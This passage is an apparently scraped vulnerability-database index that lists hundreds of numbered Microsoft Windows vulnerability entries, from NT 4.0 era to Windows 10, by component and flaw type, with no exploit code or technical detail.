98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE privilege escalation [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4181] Microsoft Windows RPC Processor privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3370] Microsoft Windows RPC Authentication denial of service [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2310] Microsoft Windows 2000 RPC weak authentication [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to 